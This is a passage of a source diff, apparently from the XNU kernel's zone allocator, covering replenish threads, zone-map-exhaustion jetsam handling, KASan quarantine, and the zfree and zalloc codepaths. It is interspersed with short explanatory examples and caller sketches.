+       assert(!z->z_replenishes && !z->z_destructible);
+       z->z_elems_rsv = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z));
+       z->z_replenishes = true;
+       os_atomic_add(&zone_replenish_active, ZONE_REPLENISH_ACTIVE_INC, relaxed);
+       z->z_async_refilling = true;
+       zone_unlock(z);
 
-                       /* A NULL element means the allocation bucket is unused */
-                       allocation->za_element = 0;
-               }
-               lck_spin_unlock(&zleak_lock);
+       kr = kernel_thread_create(zone_replenish_thread, z, MAXPRI_KERNEL, &th);
+       if (kr != KERN_SUCCESS) {
+               panic("zone_replenish_configure, thread create: 0x%x", kr);
        }
+       /* make sure this thread can't lose its stack */
+       assert(th->reserved_stack == th->kernel_stack);
+
+       snprintf(name, sizeof(name), "z_replenish(%s)", zone_name(z));
+       thread_set_thread_name(th, name);
+
+       thread_mtx_lock(th);
+       th->options |= TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV;
+       thread_start(th);
+       thread_mtx_unlock(th);
+
+       thread_deallocate(th);
 }
 
-#endif /* CONFIG_ZLEAKS */
+/*! @} */
+#endif /* !ZALLOC_TEST */
+#pragma mark zone jetsam integration
+#if !ZALLOC_TEST
 
-/*  These functions outside of CONFIG_ZLEAKS because they are also used in
- *  mbuf.c for mbuf leak-detection.  This is why they lack the z_ prefix.
+/*
+ * We're being very conservative here and picking a value of 95%. We might need to lower this if
+ * we find that we're not catching the problem and are still hitting zone map exhaustion panics.
  */
+#define ZONE_MAP_JETSAM_LIMIT_DEFAULT 95
 
-/* "Thomas Wang's 32/64 bit mix functions."  http://www.concentric.net/~Ttwang/tech/inthash.htm */
-uintptr_t
-hash_mix(uintptr_t x)
+/*
+ * Trigger zone-map-exhaustion jetsams if the zone map is X% full, where X=zone_map_jetsam_limit.
+ * Can be set via boot-arg "zone_map_jetsam_limit". Set to 95% by default.
+ */
+TUNABLE_WRITEABLE(unsigned int, zone_map_jetsam_limit, "zone_map_jetsam_limit",
+    ZONE_MAP_JETSAM_LIMIT_DEFAULT);
+
+void
+get_zone_map_size(uint64_t *current_size, uint64_t *capacity)
 {
-#ifndef __LP64__
-       x += ~(x << 15);
-       x ^=  (x >> 10);
-       x +=  (x << 3);
-       x ^=  (x >> 6);
-       x += ~(x << 11);
-       x ^=  (x >> 16);
-#else
-       x += ~(x << 32);
-       x ^=  (x >> 22);
-       x += ~(x << 13);
-       x ^=  (x >> 8);
-       x +=  (x << 3);
-       x ^=  (x >> 15);
-       x += ~(x << 27);
-       x ^=  (x >> 31);
-#endif
-       return x;
+       vm_offset_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
+       *current_size = ptoa_64(phys_pages);
+       *capacity = ptoa_64(zone_phys_mapped_max_pages);
 }
 
-uint32_t
-hashbacktrace(uintptr_t* bt, uint32_t depth, uint32_t max_size)
+void
+get_largest_zone_info(char *zone_name, size_t zone_name_len, uint64_t *zone_size)
 {
-       uintptr_t hash = 0;
-       uintptr_t mask = max_size - 1;
+       zone_t largest_zone = zone_find_largest();
 
-       while (depth) {
-               hash += bt[--depth];
+       /*
+        * Append kalloc heap name to zone name (if zone is used by kalloc)
+        */
+       snprintf(zone_name, zone_name_len, "%s%s",
+           zone_heap_name(largest_zone), largest_zone->z_name);
+
+       *zone_size = zone_size_wired(largest_zone);
+}
+
+bool
+zone_map_nearing_exhaustion(void)
+{
+       uint64_t phys_pages = os_atomic_load(&zones_phys_page_mapped_count, relaxed);
+       return phys_pages * 100 > zone_phys_mapped_max_pages * zone_map_jetsam_limit;
+}
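
A worked example of the check above with made-up figures (runnable user-space arithmetic; the real inputs come from zones_phys_page_mapped_count and zone_phys_mapped_max_pages):

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>

    int
    main(void)
    {
        /* hypothetical: 1,000,000 wirable pages in the zone map, 95% limit */
        uint64_t mapped = 950001, max_pages = 1000000, limit = 95;

        /* 950,001 * 100 = 95,000,100  >  1,000,000 * 95 = 95,000,000 */
        bool nearing = mapped * 100 > max_pages * limit;
        printf("nearing exhaustion: %s\n", nearing ? "yes" : "no"); /* yes */
        return 0;
    }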
+
+
+#define VMENTRY_TO_VMOBJECT_COMPARISON_RATIO 98
+
+/*
+ * Tries to kill a single process if it can attribute one to the largest zone. If not, wakes up the memorystatus thread
+ * to walk through the jetsam priority bands and kill processes.
+ */
+static void
+kill_process_in_largest_zone(void)
+{
+       pid_t pid = -1;
+       zone_t largest_zone = zone_find_largest();
+
+       printf("zone_map_exhaustion: Zone mapped %lld of %lld, used %lld, capacity %lld [jetsam limit %d%%]\n",
+           ptoa_64(os_atomic_load(&zones_phys_page_mapped_count, relaxed)),
+           ptoa_64(zone_phys_mapped_max_pages),
+           (uint64_t)zone_submaps_approx_size(),
+           (uint64_t)(zone_foreign_size() + zone_native_size()),
+           zone_map_jetsam_limit);
+       printf("zone_map_exhaustion: Largest zone %s%s, size %lu\n", zone_heap_name(largest_zone),
+           largest_zone->z_name, (uintptr_t)zone_size_wired(largest_zone));
+
+       /*
+        * We want to make sure we don't call this function from userspace.
+        * Otherwise we could end up trying to synchronously kill the process
+        * whose context we're in, causing the system to hang.
+        */
+       assert(current_task() == kernel_task);
+
+       /*
+        * If vm_object_zone is the largest, check to see if the number of
+        * elements in vm_map_entry_zone is comparable.
+        *
+        * If so, consider vm_map_entry_zone as the largest. This lets us target
+        * a specific process to jetsam to quickly recover from the zone map
+        * bloat.
+        */
+       if (largest_zone == vm_object_zone) {
+               unsigned int vm_object_zone_count = zone_count_allocated(vm_object_zone);
+               unsigned int vm_map_entry_zone_count = zone_count_allocated(vm_map_entry_zone);
+               /* Is the VM map entries zone count >= 98% of the VM objects zone count? */
+               if (vm_map_entry_zone_count >= ((vm_object_zone_count * VMENTRY_TO_VMOBJECT_COMPARISON_RATIO) / 100)) {
+                       largest_zone = vm_map_entry_zone;
+                       printf("zone_map_exhaustion: Picking VM map entries as the zone to target, size %lu\n",
+                           (uintptr_t)zone_size_wired(largest_zone));
+               }
+       }
+
+       /* TODO: Extend this to check for the largest process in other zones as well. */
+       if (largest_zone == vm_map_entry_zone) {
+               pid = find_largest_process_vm_map_entries();
+       } else {
+               printf("zone_map_exhaustion: Nothing to do for the largest zone [%s%s]. "
+                   "Waking up memorystatus thread.\n", zone_heap_name(largest_zone),
+                   largest_zone->z_name);
        }
+       if (!memorystatus_kill_on_zone_map_exhaustion(pid)) {
+               printf("zone_map_exhaustion: Call to memorystatus failed, victim pid: %d\n", pid);
+       }
+}
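
(Reading the 98% comparison above with hypothetical counts, purely for illustration: with 1,000,000 allocated vm_objects and 985,000 allocated vm_map_entries, 985000 >= (1000000 * 98) / 100 = 980000 holds, so vm_map_entry_zone is treated as the largest zone and find_largest_process_vm_map_entries() picks a single victim instead of only waking the memorystatus thread.)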
 
-       hash = hash_mix(hash) & mask;
-
-       assert(hash < max_size);
+#endif /* !ZALLOC_TEST */
+#pragma mark zfree
+#if !ZALLOC_TEST
+#if KASAN_ZALLOC
 
-       return (uint32_t) hash;
-}
+/*!
+ * @defgroup zfree
+ * @{
+ *
+ * @brief
+ * The codepath for zone frees.
+ *
+ * @discussion
+ * There are 4 major ways to allocate memory that end up in the zone allocator:
+ * - @c zfree()
+ * - @c zfree_percpu()
+ * - @c kfree*()
+ * - @c zfree_permanent()
+ *
+ * While permanent zones have their own allocation scheme, all other codepaths
+ * will eventually go through the @c zfree_ext() choking point.
+ *
+ * Ignoring the @c gzalloc_free() codepath, the decision tree looks like this:
+ * <code>
+ * zfree_ext()
+ *      ├───> zfree_cached() ────────────────╮
+ *      │       │                            │
+ *      │       │                            │
+ *      │       ├───> zfree_cached_slow() ───┤
+ *      │       │            │               │
+ *      │       │            v               │
+ *      ╰───────┴───> zfree_item() ──────────┴───>
+ * </code>
+ *
+ * @c zfree_ext() takes care of all the generic work to perform on an element
+ * before it is freed (zeroing, logging, tagging, ...) then will hand it off to:
+ * - @c zfree_item() if zone caching is off
+ * - @c zfree_cached() if zone caching is on.
+ *
+ * @c zfree_cached can take a number of decisions:
+ * - a fast path if the (f) or (a) magazines have space (preemption disabled),
+ * - using the cpu local or recirculation depot calling @c zfree_cached_slow(),
+ * - falling back to @c zfree_item() when CPU caching has been disabled.
+ */
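
(For orientation, a minimal caller-side sketch of how an element reaches this path. The type, zone, and function names below are hypothetical; only zone_create(), the ZC_* flags and zfree() are existing KPI, and this sketch is not part of the commit.)

/* Hypothetical client of the zfree() path described above. */
struct widget {
	uint64_t w_id;
	uint64_t w_flags;
};

static zone_t widget_zone;

static void
widget_zone_setup(void)
{
	/* zero-on-free requested so freed widgets cannot leak stale data */
	widget_zone = zone_create("example.widget", sizeof(struct widget),
	    ZC_ZFREE_CLEARMEM);
}

static void
widget_destroy(struct widget *w)
{
	/* funnels into zfree_ext(), then zfree_cached() or zfree_item() */
	zfree(widget_zone, w);
}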
 
 /*
- *  TODO: Determine how well distributed this is
- *      max_size must be a power of 2. i.e 0x10000 because 0x10000-1 is 0x0FFFF which is a great bitmask
+ * Called from zfree() to add the element being freed to the KASan quarantine.
+ *
+ * Returns true if the newly-freed element made it into the quarantine without
+ * displacing another, false otherwise. In the latter case, addrp points to the
+ * address of the displaced element, which will be freed by the zone.
  */
-uint32_t
-hashaddr(uintptr_t pt, uint32_t max_size)
+static bool
+kasan_quarantine_freed_element(
+       zone_t          *zonep,         /* the zone the element is being freed to */
+       void            **addrp)        /* address of the element being freed */
 {
-       uintptr_t hash = 0;
-       uintptr_t mask = max_size - 1;
-
-       hash = hash_mix(pt) & mask;
+       zone_t zone = *zonep;
+       void *addr = *addrp;
 
-       assert(hash < max_size);
+       /*
+        * Resize back to the real allocation size and hand off to the KASan
+        * quarantine. `addr` may then point to a different allocation, if the
+        * current element replaced another in the quarantine. The zone then
+        * takes ownership of the swapped out free element.
+        */
+       vm_size_t usersz = zone_elem_size(zone) - 2 * zone->z_kasan_redzone;
+       vm_size_t sz = usersz;
 
-       return (uint32_t) hash;
+       if (addr && zone->z_kasan_redzone) {
+               kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC);
+               addr = (void *)kasan_dealloc((vm_address_t)addr, &sz);
+               assert(sz == zone_elem_size(zone));
+       }
+       if (addr && !zone->kasan_noquarantine) {
+               kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true);
+               if (!addr) {
+                       return TRUE;
+               }
+       }
+       if (addr && zone->kasan_noquarantine) {
+               kasan_unpoison(addr, zone_elem_size(zone));
+       }
+       *addrp = addr;
+       return FALSE;
 }
 
-/* End of all leak-detection code */
-#pragma mark zone creation, configuration, destruction
+#endif /* KASAN_ZALLOC */
 
-static zone_t
-zone_init_defaults(zone_id_t zid)
+__header_always_inline void
+zfree_drop(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze,
+    bool recirc)
 {
-       zone_t z = &zone_array[zid];
-
-       z->page_count_max = ~0u;
-       z->collectable = true;
-       z->expandable = true;
-       z->submap_idx = Z_SUBMAP_IDX_GENERAL_MAP;
+       vm_offset_t esize = zone_elem_size(zone);
 
-       simple_lock_init(&z->lock, 0);
+       if (zone_meta_mark_free(meta, ze) == recirc) {
+               zone_meta_double_free_panic(zone, ze, __func__);
+       }
 
-       return z;
-}
+       vm_offset_t old_size = meta->zm_alloc_size;
+       vm_offset_t max_size = ptoa(meta->zm_chunk_len) + ZM_ALLOC_SIZE_LOCK;
+       vm_offset_t new_size = zone_meta_alloc_size_sub(zone, meta, esize);
 
-static bool
-zone_is_initializing(zone_t z)
-{
-       return !z->z_self && !z->destroyed;
+       if (new_size == 0) {
+               /* whether the page was on the intermediate or all_used queue, move it to free */
+               zone_meta_requeue(zone, &zone->z_pageq_empty, meta);
+               zone->z_wired_empty += meta->zm_chunk_len;
+       } else if (old_size + esize > max_size) {
+               /* first free element on page, move from all_used */
+               zone_meta_requeue(zone, &zone->z_pageq_partial, meta);
+       }
 }
 
 static void
-zone_set_max(zone_t z, vm_size_t max)
+zfree_item(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze)
 {
-#if KASAN_ZALLOC
-       if (z->kasan_redzone) {
-               /*
-                * Adjust the max memory for the kasan redzones
-                */
-               max += (max / z->pcpu_elem_size) * z->kasan_redzone * 2;
-       }
-#endif
-       if (max < z->percpu ? 1 : z->alloc_pages) {
-               max = z->percpu ? 1 : z->alloc_pages;
-       } else {
-               max = atop(round_page(max));
-       }
-       z->page_count_max = max;
-}
+       /* transfer preemption count to lock */
+       zone_lock_nopreempt_check_contention(zone, NULL);
 
-void
-zone_set_submap_idx(zone_t zone, unsigned int sub_map_idx)
-{
-       if (!zone_is_initializing(zone)) {
-               panic("%s: called after zone_create()", __func__);
-       }
-       if (sub_map_idx > zone_last_submap_idx) {
-               panic("zone_set_submap_idx(%d) > %d", sub_map_idx, zone_last_submap_idx);
-       }
-       zone->submap_idx = sub_map_idx;
+       zfree_drop(zone, meta, ze, false);
+       zone_elems_free_add(zone, 1);
+
+       zone_unlock(zone);
 }
 
-void
-zone_set_noexpand(
-       zone_t          zone,
-       vm_size_t       max)
+__attribute__((noinline))
+static void
+zfree_cached_slow(zone_t zone, struct zone_page_metadata *meta,
+    zone_element_t ze, zone_cache_t cache)
 {
-       if (!zone_is_initializing(zone)) {
-               panic("%s: called after zone_create()", __func__);
+       struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags);
+       zone_magazine_t mag = NULL;
+       uint16_t n = 0;
+
+       if (zone_meta_is_free(meta, ze)) {
+               zone_meta_double_free_panic(zone, ze, __func__);
        }
-       zone->expandable = false;
-       zone_set_max(zone, max);
-}
 
-void
-zone_set_exhaustible(
-       zone_t          zone,
-       vm_size_t       max)
-{
-       if (!zone_is_initializing(zone)) {
-               panic("%s: called after zone_create()", __func__);
+       if (zone == zc_magazine_zone) {
+               mag = (zone_magazine_t)zone_element_addr(ze,
+                   zone_elem_size(zone));
+#if KASAN_ZALLOC
+               kasan_poison_range((vm_offset_t)mag, zone_elem_size(zone),
+                   ASAN_VALID);
+#endif
+       } else {
+               mag = zone_magazine_alloc(Z_NOWAIT);
+               if (__improbable(mag == NULL)) {
+                       return zfree_item(zone, meta, ze);
+               }
+               mag->zm_cur = 1;
+               mag->zm_elems[0] = ze;
        }
-       zone->expandable = false;
-       zone->exhaustible = true;
-       zone_set_max(zone, max);
-}
 
-/**
- * @function zone_create_find
- *
- * @abstract
- * Finds an unused zone for the given name and element size.
- *
- * @param name          the zone name
- * @param size          the element size (including redzones, ...)
- * @param flags         the flags passed to @c zone_create*
- * @param zid           the desired zone ID or ZONE_ID_ANY
- *
- * @returns             a zone to initialize further.
- */
-static zone_t
-zone_create_find(
-       const char             *name,
-       vm_size_t               size,
-       zone_create_flags_t     flags,
-       zone_id_t               zid)
-{
-       zone_id_t nzones;
-       zone_t z;
+       mag = zone_magazine_replace(&cache->zc_free_cur,
+           &cache->zc_free_elems, mag);
 
-       simple_lock(&all_zones_lock, &zone_locks_grp);
+       z_debug_assert(cache->zc_free_cur <= 1);
+       z_debug_assert(mag->zm_cur == zc_mag_size());
 
-       nzones = (zone_id_t)os_atomic_load(&num_zones, relaxed);
-       assert(num_zones_in_use <= nzones && nzones < MAX_ZONES);
+       STAILQ_INSERT_HEAD(&mags, mag, zm_link);
+       n = 1;
 
-       if (__improbable(nzones < ZONE_ID__FIRST_DYNAMIC)) {
+       if (cache->zc_depot_max >= 2 * zc_mag_size()) {
                /*
-                * The first time around, make sure the reserved zone IDs
-                * have an initialized lock as zone_index_foreach() will
-                * enumerate them.
+                * If we can use the local depot (zc_depot_max allows for
+                * 2 magazines worth of elements) then:
+                *
+                * 1. if we have space for an extra depot locally,
+                *    push it, and leave.
+                *
+                * 2. if we overflow, then take (1 / zc_recirc_denom)
+                *    of the depot out, in order to migrate it to the
+                *    recirculation depot.
                 */
-               while (nzones < ZONE_ID__FIRST_DYNAMIC) {
-                       zone_init_defaults(nzones++);
-               }
-
-               os_atomic_store(&num_zones, nzones, release);
-       }
+               zone_depot_lock_nopreempt(cache);
 
-       if (zid != ZONE_ID_ANY) {
-               if (zid >= ZONE_ID__FIRST_DYNAMIC) {
-                       panic("zone_create: invalid desired zone ID %d for %s",
-                           zid, name);
+               if ((cache->zc_depot_cur + 2) * zc_mag_size() <=
+                   cache->zc_depot_max) {
+                       cache->zc_depot_cur++;
+                       STAILQ_INSERT_TAIL(&cache->zc_depot, mag, zm_link);
+                       return zone_depot_unlock(cache);
                }
-               if (flags & ZC_DESTRUCTIBLE) {
-                       panic("zone_create: ID %d (%s) must be permanent", zid, name);
-               }
-               if (zone_array[zid].z_self) {
-                       panic("zone_create: creating zone ID %d (%s) twice", zid, name);
+
+               while (zc_recirc_denom * cache->zc_depot_cur * zc_mag_size() >=
+                   (zc_recirc_denom - 1) * cache->zc_depot_max) {
+                       mag = STAILQ_FIRST(&cache->zc_depot);
+                       STAILQ_REMOVE_HEAD(&cache->zc_depot, zm_link);
+                       STAILQ_INSERT_TAIL(&mags, mag, zm_link);
+                       cache->zc_depot_cur--;
+                       n++;
                }
-               z = &zone_array[zid];
+
+               zone_depot_unlock(cache);
        } else {
-               if (flags & ZC_DESTRUCTIBLE) {
-                       /*
-                        * If possible, find a previously zdestroy'ed zone in the
-                        * zone_array that we can reuse.
-                        */
-                       for (int i = bitmap_first(zone_destroyed_bitmap, MAX_ZONES);
-                           i >= 0; i = bitmap_next(zone_destroyed_bitmap, i)) {
-                               z = &zone_array[i];
+               enable_preemption();
+       }
 
-                               /*
-                                * If the zone name and the element size are the
-                                * same, we can just reuse the old zone struct.
-                                */
-                               if (strcmp(z->z_name, name) || zone_elem_size(z) != size) {
-                                       continue;
-                               }
-                               bitmap_clear(zone_destroyed_bitmap, i);
-                               z->destroyed = false;
-                               z->z_self = z;
-                               zid = (zone_id_t)i;
-                               goto out;
-                       }
+       /*
+        * Preflight validity of all the elements before we touch the zone
+        * metadata, and then insert them into the recirculation depot.
+        */
+       STAILQ_FOREACH(mag, &mags, zm_link) {
+               for (uint16_t i = 0; i < zc_mag_size(); i++) {
+                       zone_element_validate(zone, mag->zm_elems[i]);
                }
+       }
 
-               zid = nzones++;
-               z = zone_init_defaults(zid);
+       zone_lock_check_contention(zone, cache);
 
-               /*
-                * The release barrier pairs with the acquire in
-                * zone_index_foreach() and makes sure that enumeration loops
-                * always see an initialized zone lock.
-                */
-               os_atomic_store(&num_zones, nzones, release);
+       STAILQ_FOREACH(mag, &mags, zm_link) {
+               for (uint16_t i = 0; i < zc_mag_size(); i++) {
+                       zone_element_t e = mag->zm_elems[i];
+
+                       if (!zone_meta_mark_free(zone_meta_from_element(e), e)) {
+                               zone_meta_double_free_panic(zone, e, __func__);
+                       }
+               }
        }
+       STAILQ_CONCAT(&zone->z_recirc, &mags);
+       zone->z_recirc_cur += n;
 
-out:
-       num_zones_in_use++;
-       simple_unlock(&all_zones_lock);
+       zone_elems_free_add(zone, n * zc_mag_size());
 
-       return z;
+       zone_unlock(zone);
 }
 
-__abortlike
 static void
-zone_create_panic(const char *name, const char *f1, const char *f2)
+zfree_cached(zone_t zone, struct zone_page_metadata *meta, zone_element_t ze)
 {
-       panic("zone_create: creating zone %s: flag %s and %s are incompatible",
-           name, f1, f2);
-}
-#define zone_create_assert_not_both(name, flags, current_flag, forbidden_flag) \
-       if ((flags) & forbidden_flag) { \
-               zone_create_panic(name, #current_flag, #forbidden_flag); \
+       zone_cache_t cache = zpercpu_get(zone->z_pcpu_cache);
+
+       if (cache->zc_free_cur >= zc_mag_size()) {
+               if (cache->zc_alloc_cur >= zc_mag_size()) {
+                       return zfree_cached_slow(zone, meta, ze, cache);
+               }
+               zone_cache_swap_magazines(cache);
+       }
+
+       if (__improbable(cache->zc_alloc_elems == NULL)) {
+               return zfree_item(zone, meta, ze);
+       }
+
+       if (zone_meta_is_free(meta, ze)) {
+               zone_meta_double_free_panic(zone, ze, __func__);
+       }
+
+       uint16_t idx = cache->zc_free_cur++;
+       if (idx >= zc_mag_size()) {
+               zone_accounting_panic(zone, "zc_free_cur overflow");
        }
+       cache->zc_free_elems[idx] = ze;
+
+       enable_preemption();
+}
 
 /*
- * Adjusts the size of the element based on minimum size, alignment
- * and kasan redzones
+ *     The function is noinline when zlog can be used so that the backtracing can
+ *     reliably skip the zfree_ext() and zfree_log_trace()
+ *     boring frames.
  */
-static vm_size_t
-zone_elem_adjust_size(
-       const char             *name __unused,
-       vm_size_t               elem_size,
-       zone_create_flags_t     flags,
-       vm_size_t              *redzone __unused)
+#if ZONE_ENABLE_LOGGING
+__attribute__((noinline))
+#endif /* ZONE_ENABLE_LOGGING */
+void
+zfree_ext(zone_t zone, zone_stats_t zstats, void *addr)
 {
-       vm_size_t size;
+       struct zone_page_metadata *page_meta;
+       vm_offset_t     elem = (vm_offset_t)addr;
+       vm_size_t       elem_size = zone_elem_size(zone);
+       zone_element_t  ze;
+
+       DTRACE_VM2(zfree, zone_t, zone, void*, addr);
+       TRACE_MACHLEAKS(ZFREE_CODE, ZFREE_CODE_2, elem_size, elem);
+#if VM_MAX_TAG_ZONES
+       if (__improbable(zone->tags)) {
+               vm_tag_t tag = *ztSlot(zone, elem) >> 1;
+               // set the tag with b0 clear so the block remains inuse
+               *ztSlot(zone, elem) = 0xFFFE;
+               vm_tag_update_zone_size(tag, zone->tag_zone_index,
+                   -(long)elem_size);
+       }
+#endif /* VM_MAX_TAG_ZONES */
+
+#if KASAN_ZALLOC
+       if (kasan_quarantine_freed_element(&zone, &addr)) {
+               return;
+       }
+       /*
+        * kasan_quarantine_freed_element() might return a different
+        * {zone, addr} than the one being freed for kalloc heaps.
+        *
+        * Make sure we reload everything.
+        */
+       elem = (vm_offset_t)addr;
+       elem_size = zone_elem_size(zone);
+#endif
+#if CONFIG_ZLEAKS
        /*
-        * Adjust element size for minimum size and pointer alignment
+        * Zone leak detection: un-track the allocation
         */
-       size = (elem_size + sizeof(vm_offset_t) - 1) & -sizeof(vm_offset_t);
-       if (((flags & ZC_PERCPU) == 0) && size < ZONE_MIN_ELEM_SIZE) {
-               size = ZONE_MIN_ELEM_SIZE;
+       if (__improbable(zone->zleak_on)) {
+               zleak_free(elem, elem_size);
+       }
+#endif /* CONFIG_ZLEAKS */
+#if ZONE_ENABLE_LOGGING
+       if (__improbable(DO_LOGGING(zone))) {
+               zfree_log_trace(zone, elem, __builtin_frame_address(0));
+       }
+#endif /* ZONE_ENABLE_LOGGING */
+#if CONFIG_GZALLOC
+       if (__improbable(zone->gzalloc_tracked)) {
+               return gzalloc_free(zone, zstats, addr);
        }
+#endif /* CONFIG_GZALLOC */
 
+       page_meta = zone_element_resolve(zone, elem, elem_size, &ze);
+       ze.ze_value |= zfree_clear_or_poison(zone, elem, elem_size);
 #if KASAN_ZALLOC
-       /*
-        * Expand the zone allocation size to include the redzones.
-        *
-        * For page-multiple zones add a full guard page because they
-        * likely require alignment.
-        */
-       vm_size_t redzone_tmp;
-       if (flags & (ZC_KASAN_NOREDZONE | ZC_PERCPU)) {
-               redzone_tmp = 0;
-       } else if ((size & PAGE_MASK) == 0) {
-               if (size != PAGE_SIZE && (flags & ZC_ALIGNMENT_REQUIRED)) {
-                       panic("zone_create: zone %s can't provide more than PAGE_SIZE"
-                           "alignment", name);
+       if (zone->z_percpu) {
+               zpercpu_foreach_cpu(i) {
+                       kasan_poison_range(elem + ptoa(i), elem_size,
+                           ASAN_HEAP_FREED);
                }
-               redzone_tmp = PAGE_SIZE;
-       } else if (flags & ZC_ALIGNMENT_REQUIRED) {
-               redzone_tmp = 0;
        } else {
-               redzone_tmp = KASAN_GUARD_SIZE;
-       }
-       size += redzone_tmp * 2;
-       if (redzone) {
-               *redzone = redzone_tmp;
+               kasan_poison_range(elem, elem_size, ASAN_HEAP_FREED);
        }
 #endif
-       return size;
+
+       disable_preemption();
+       zpercpu_get(zstats)->zs_mem_freed += elem_size;
+
+       if (zone->z_pcpu_cache) {
+               return zfree_cached(zone, page_meta, ze);
+       }
+
+       return zfree_item(zone, page_meta, ze);
 }
 
-/*
- * Returns the allocation chunk size that has least framentation
- */
-static vm_size_t
-zone_get_min_alloc_granule(
-       vm_size_t               elem_size,
-       zone_create_flags_t     flags)
+void
+(zfree)(union zone_or_view zov, void *addr)
 {
-       vm_size_t alloc_granule = PAGE_SIZE;
-       if (flags & ZC_PERCPU) {
-               alloc_granule = PAGE_SIZE * zpercpu_count();
-               if (PAGE_SIZE % elem_size > 256) {
-                       panic("zone_create: per-cpu zone has too much fragmentation");
-               }
-       } else if ((elem_size & PAGE_MASK) == 0) {
-               /* zero fragmentation by definition */
-               alloc_granule = elem_size;
-       } else if (alloc_granule % elem_size == 0) {
-               /* zero fragmentation by definition */
-       } else {
-               vm_size_t frag = (alloc_granule % elem_size) * 100 / alloc_granule;
-               vm_size_t alloc_tmp = PAGE_SIZE;
-               while ((alloc_tmp += PAGE_SIZE) <= ZONE_MAX_ALLOC_SIZE) {
-                       vm_size_t frag_tmp = (alloc_tmp % elem_size) * 100 / alloc_tmp;
-                       if (frag_tmp < frag) {
-                               frag = frag_tmp;
-                               alloc_granule = alloc_tmp;
-                       }
-               }
-       }
-       return alloc_granule;
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(!zone->z_percpu);
+       zfree_ext(zone, zstats, addr);
 }
 
-vm_size_t
-zone_get_foreign_alloc_size(
-       const char             *name __unused,
-       vm_size_t               elem_size,
-       zone_create_flags_t     flags,
-       uint16_t                min_pages)
+void
+zfree_percpu(union zone_or_view zov, void *addr)
 {
-       vm_size_t adjusted_size = zone_elem_adjust_size(name, elem_size, flags,
-           NULL);
-       vm_size_t alloc_granule = zone_get_min_alloc_granule(adjusted_size,
-           flags);
-       vm_size_t min_size = min_pages * PAGE_SIZE;
-       /*
-        * Round up min_size to a multiple of alloc_granule
-        */
-       return ((min_size + alloc_granule - 1) / alloc_granule)
-              * alloc_granule;
+       zone_t zone = zov.zov_view->zv_zone;
+       zone_stats_t zstats = zov.zov_view->zv_stats;
+       assert(zone->z_percpu);
+       zfree_ext(zone, zstats, (void *)__zpcpu_demangle(addr));
 }
 
-zone_t
-zone_create_ext(
-       const char             *name,
-       vm_size_t               size,
-       zone_create_flags_t     flags,
-       zone_id_t               desired_zid,
-       void                  (^extra_setup)(zone_t))
+/*! @} */
+#endif /* !ZALLOC_TEST */
+#pragma mark zalloc
+#if !ZALLOC_TEST
+
+/*!
+ * @defgroup zalloc
+ * @{
+ *
+ * @brief
+ * The codepath for zone allocations.
+ *
+ * @discussion
+ * There are 4 major ways to allocate memory that end up in the zone allocator:
+ * - @c zalloc(), @c zalloc_flags(), ...
+ * - @c zalloc_percpu()
+ * - @c kalloc*()
+ * - @c zalloc_permanent()
+ *
+ * While permanent zones have their own allocation scheme, all other codepaths
+ * will eventually go through the @c zalloc_ext() choking point.
+ *
+ * Ignoring the @c zalloc_gz() codepath, the decision tree looks like this:
+ * <code>
+ * zalloc_ext()
+ *      │
+ *      ├───> zalloc_cached() ──────> zalloc_cached_fast() ───╮
+ *      │         │                             ^             │
+ *      │         │                             │             │
+ *      │         ╰───> zalloc_cached_slow() ───╯             │
+ *      │                         │                           │
+ *      │<─────────────────╮      ├─────────────╮             │
+ *      │                  │      │             │             │
+ *      │                  │      v             │             │
+ *      │<───────╮  ╭──> zalloc_item_slow() ────┤             │
+ *      │        │  │                           │             │
+ *      │        │  │                           v             │
+ *      ╰───> zalloc_item() ──────────> zalloc_item_fast() ───┤
+ *                                                            │
+ *                                                            v
+ *                                                     zalloc_return()
+ * </code>
+ *
+ *
+ * The @c zalloc_item() track is used when zone caching is off:
+ * - @c zalloc_item_fast() is used when there are enough elements available,
+ * - @c zalloc_item_slow() is used when a refill is needed, which can cause
+ *   the zone to grow. This is the only codepath that refills.
+ *
+ * This track uses the zone lock for serialization:
+ * - taken in @c zalloc_item(),
+ * - maintained during @c zalloc_item_slow() (possibly dropped and re-taken),
+ * - dropped in @c zalloc_item_fast().
+ *
+ *
+ * The @c zalloc_cached() track is used when zone caching is on:
+ * - @c zalloc_cached_fast() is taken when the cache has elements,
+ * - @c zalloc_cached_slow() is taken if a cache refill is needed.
+ *   It can choose among several strategies:
+ *    ~ @c zalloc_cached_from_depot() to try to reuse cpu stashed magazines,
+ *    ~ using the global recirculation depot @c z_recirc,
+ *    ~ using zalloc_import() if the zone has enough elements,
+ *    ~ falling back to the @c zalloc_item() track if zone caching is disabled
+ *      due to VM pressure or the zone has no available elements.
+ *
+ * This track disables preemption for serialization:
+ * - preemption is disabled in @c zalloc_cached(),
+ * - kept disabled during @c zalloc_cached_slow(), converted into a zone lock
+ *   if switching to @c zalloc_item_slow(),
+ * - preemption is reenabled in @c zalloc_cached_fast().
+ *
+ * @c zalloc_cached_from_depot() also takes depot locks (taken by the caller,
+ * released by @c zalloc_cached_from_depot()).
+ *
+ * In general the @c zalloc_*_slow() codepaths deal with refilling and will
+ * tail call into the @c zalloc_*_fast() code to perform the actual allocation.
+ *
+ * @c zalloc_return() is the final function everyone tail calls into,
+ * which prepares the element for consumption by the caller and deals with
+ * common treatment (zone logging, tags, kasan, validation, ...).
+ */
+
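
(The matching caller-side view, reusing the hypothetical widget_zone from the zfree sketch earlier; Z_WAITOK, Z_NOWAIT and Z_ZERO are the flags handled by zalloc_ext() and zalloc_return() below. Again a sketch, not part of the commit.)

/* Hypothetical caller of the entry points documented above. */
static struct widget *
widget_create(bool can_block)
{
	if (can_block) {
		/* may block while the zone grows; Z_ZERO is honored in zalloc_return() */
		return zalloc_flags(widget_zone, Z_WAITOK | Z_ZERO);
	}
	/* never blocks: the slow path may fail and return NULL under memory pressure */
	return zalloc_flags(widget_zone, Z_NOWAIT | Z_ZERO);
}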
+/*!
